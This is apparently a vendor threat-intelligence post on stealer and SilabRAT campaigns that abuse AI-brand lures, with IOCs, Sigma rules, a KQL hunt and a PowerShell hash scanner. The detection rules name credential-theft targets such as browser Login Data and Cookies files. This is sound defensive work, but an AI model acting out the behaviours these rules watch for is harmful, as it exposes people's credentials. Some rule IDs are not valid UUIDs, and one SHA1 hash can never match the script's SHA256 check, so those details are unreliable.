AI-Hype Stealers & SilabRAT MaaS: OTX Pulse Analysis — Enterprise Detection Pack | Security Arsenal

Threat Summary

The latest OTX pulses indicate a convergence of threat activity leveraging the "AI hype cycle" to distribute advanced information stealers and Remote Access Trojans (RATs). Threat actors Storm-3075 and TroyDen are actively impersonating AI brands (e.g., ChatGPT, DeepSeek) via malvertising and social engineering to deliver payloads like Vidar, Lumma Stealer, and Redline. Simultaneously, the threat actor o1oo1 is marketing the SilabRAT MaaS (Malware-as-a-Service) platform, which utilizes Hijack Loader to compromise systems and clone browser profiles for session hijacking. Collectively, these campaigns represent a coordinated shift towards financially motivated credential theft and cryptocurrency hijacking using infrastructure hosted on legitimate platforms like GitHub and compromised domains.

Threat Actor / Malware Profile

Storm-3075 (AI Impersonation)

Malware: Vidar, Lumma Stealer, Oyster, GhostSocks.
Distribution: Malvertising campaigns and SEO poisoning targeting users searching for AI tools.
Behavior: Uses Hijack Loader to decrypt and inject shellcode. Focuses on stealing credentials, cookies, and cryptocurrency wallet data.

o1oo1 (SilabRAT Developer)

Malware: SilabRAT, HijackLoader, AsmCrypt.
Distribution: Sold via Darkweb forums ($5,000/month). Delivered via malicious loaders.
Behavior: Features Hidden VNC (hVNC) for stealthy remote control and browser profile cloning to bypass MFA. Uses AsmCrypt for obfuscation.

TroyDen (Lure Factory)

Malware: LuaJIT-based infostealers, Redline, LummaStealer.
Distribution: GitHub repositories using AI-generated biological taxonomy names to lure developers and gamers.
Behavior: Two-component payload designed to evade detection while targeting Roblox, crypto, and developer credentials.

IOC Analysis

Domains & Hostnames: brokeapt.com, pan.rongtv.xyz, pan.ssffaa19.xyz. These serve as C2 servers or initial download vectors for malvertising. SOC teams should block these at the perimeter and DNS layer.
IPv4: 91.199.163.124. Identified as C2 infrastructure for the SilabRAT campaign. Immediate blocking is required.
File Hashes (SHA256/SHA1): Multiple samples associated with Vidar, Lumma, and SilabRAT payloads. Operationalize these by scanning endpoint forensic artifacts (Amcache, Shimcache, and $MFT) for these specific hashes.

Detection Engineering

Sigma Rules

YAML

title: Potential Hijack Loader Shellcode Execution
id: 4e8f3c9a-1a2b-4c6d-9e8f-1a2b3c4d5e6f
description: Detects suspicious process execution patterns often associated with Hijack Loader used by Storm-3075 and SilabRAT campaigns involving regsvr32 or rundll32 loading unsigned DLLs.
status: experimental
date: 2026/06/11
author: Security Arsenal
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\regsvr32.exe'
            - '\rundll32.exe'
        CommandLine|contains:
            - 'scrobj.dll'
            - 'vbscript'
    condition: selection
falsepositives:
    - Legitimate system administration scripts
level: high
tags:
    - defense.evasion
    - t1055.001
---
title: SilabRAT Browser Profile Cloning Activity
id: 5f9g4d0b-2b3c-5d7e-0f1g-2b3c4d5e6f7a
description: Detects non-browser processes accessing browser credential files (Login Data, Cookies), a behavior consistent with SilabRAT and Vidar stealer operations.
status: experimental
date: 2026/06/11
author: Security Arsenal
logsource:
    category: file_access
    product: windows
detection:
    selection:
        TargetFilename|contains:
            - '\Google\Chrome\User Data\Default\Cookies'
            - '\Google\Chrome\User Data\Default\Login Data'
            - '\Mozilla\Firefox\Profiles\'
    filter_legit:
        Image|contains:
            - '\chrome.exe'
            - '\firefox.exe'
            - '\msedge.exe'
    condition: selection and not filter_legit
falsepositives:
    - Backup software
    - Antivirus scans
level: critical
tags:
    - credential.access
    - t1005
---
title: OTX AI-Threat C2 Network Connection
id: 6g0h5e1c-3c4d-6e8f-1g2h-3c4d5e6f7a8b
description: Detects network connections to known C2 infrastructure associated with the Storm-3075 and SilabRAT campaigns (2026-06-11).
status: experimental
date: 2026/06/11
author: Security Arsenal
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Initiated: 'true'
        DestinationHostname|contains:
            - 'brokeapt.com'
            - 'rongtv.xyz'
            - 'ssffaa19.xyz'
    selection_ip:
        DestinationIp: '91.199.163.124'
    condition: 1 of selection*
falsepositives:
    - Unknown
level: critical
tags:
    - c2
    - t1071.004

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender

// Hunt for network connections to IOCs from Pulse 1 and 3
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl in ("brokeapt.com", "pan.rongtv.xyz", "pan.ssffaa19.xyz")
       or RemoteIP == "91.199.163.124"
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP, RemotePort
| extend IOCType = iff(RemoteIP == "91.199.163.124", "SilabRAT_C2_IP", "Storm_3075_Domain")

PowerShell Hunt Script

PowerShell

# IOC Scanner for Pulse 1 & 3 File Hashes
$TargetHashes = @(
    "4f5c5b3ef45cfff7721754487a86aeff9a2e6e32", # SHA1
    "0a26238f6c516de5885457c93042531aa59bc206a9537cebf5267cedc6c68531", # SHA256
    "25270cc429ada8028b5b33220ed412c47907ecceea7377d608fac5af01bed56a",
    "5455341ed1bbe75a664fca2dd0794c508e1874f75360253a7ff5bc119bc92d80",
    "56d722b0331bf0aaa86bb37483486c6dff6ad9427fc473ed7c3226c21a9bdd23",
    "3a6adbe0081b2488e0f137496e92591e0c29148154b2d99faadab9cc435b879b",
    "79f8da9f9fb4ac7c16d9c210f1f6ef418357a3e7bf602b1dd03a490596fa58c5",
    "fb56e66920c84ef9e51db0ea23144f5755daef97cbff8613b05ab56d0dc9d623",
    "fbce30a0c852972fdc24f1b6a7c270512a50ef1a7c6c88c88b92a2dcbdfdd023"
)

Write-Host "Scanning for known IOCs..." -ForegroundColor Yellow

# Check Running Processes
Get-Process | ForEach-Object {
    try {
        $Path = $_.Path
        if ($Path -and (Test-Path $Path)) {
            $Hash = (Get-FileHash -Path $Path -Algorithm SHA256 -ErrorAction Stop).Hash
            if ($TargetHashes -contains $Hash) {
                Write-Host "[ALERT] Malicious Process Found: $Path (PID: $($_.Id))" -ForegroundColor Red
            }
        }
    } catch {}
}

# Check Common Download Directories
$PathsToScan = @("$env:USERPROFILE\Downloads", "$env:TEMP", "$env:APPDATA")
foreach ($Path in $PathsToScan) {
    if (Test-Path $Path) {
        Get-ChildItem -Path $Path -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {
            $Hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            if ($TargetHashes -contains $Hash) {
                Write-Host "[ALERT] Malicious File Found: $($_.FullName)" -ForegroundColor Red
            }
        }
    }
}
Write-Host "Scan Complete." -ForegroundColor Green

Response Priorities

Immediate:
- Block all listed IOCs (IPs and Domains) on perimeter firewalls, proxies, and EDR systems.
- Initiate a hunt for the specific SHA256 file hashes provided in Pulse 1 and Pulse 3 across all endpoints.
24h:
- Conduct identity verification for users who may have interacted with AI-themed phishing lures or suspicious GitHub repositories.
- Rotate credentials for any accounts identified as compromised during the artifact hunt.
1 Week:
- Harden architecture against malvertising by implementing DNS filtering and enforcing strict software allow-listing to prevent the execution of loaders like Hijack Loader.
- Review and restrict access to GitHub repositories outside of the corporate-approved list to mitigate the TroyDen "Lure Factory" vector.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

AI-Hype Stealers & SilabRAT MaaS: OTX Pulse Analysis — Enterprise Detection Pack